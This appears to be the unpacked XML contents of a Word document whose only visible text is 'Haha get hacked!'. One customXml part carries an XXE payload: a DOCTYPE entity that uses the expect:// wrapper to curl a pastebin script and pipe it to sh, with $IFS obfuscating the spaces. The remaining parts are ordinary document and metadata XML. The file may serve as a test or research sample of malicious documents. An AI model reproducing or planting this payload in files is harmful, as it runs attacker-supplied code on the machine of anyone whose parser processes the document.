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  <w:t>Haha get hacked!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start w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:end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1.xml><?xml version="1.0" ?>
<!DOCTYPE l33t [
<!ELEMENT l33t ANY [
<!ENTITY % hacktheplanet SYSTEM "expect://curl$IFS'pastebin.com/raw/puTaMkNR$IFS|sh'">%hacktheplanet;]>
<r>&exfil;</r>

</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://purl.oclc.org/ooxml/officeDocument/customXml" ds:itemID="{97B3C684-C5A6-4543-AD70-5D2B5D341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  <Pages>1</Pages>
  <Words>3</Words>
  <Characters>14</Characters>
  <CharactersWithSpaces>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2020-01-22T20:32:00Z</dcterms:created>
  <dc:creator>Daniel C</dc:creator>
  <dc:description/>
  <dc:language>en-IE</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-13T20:58:58Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>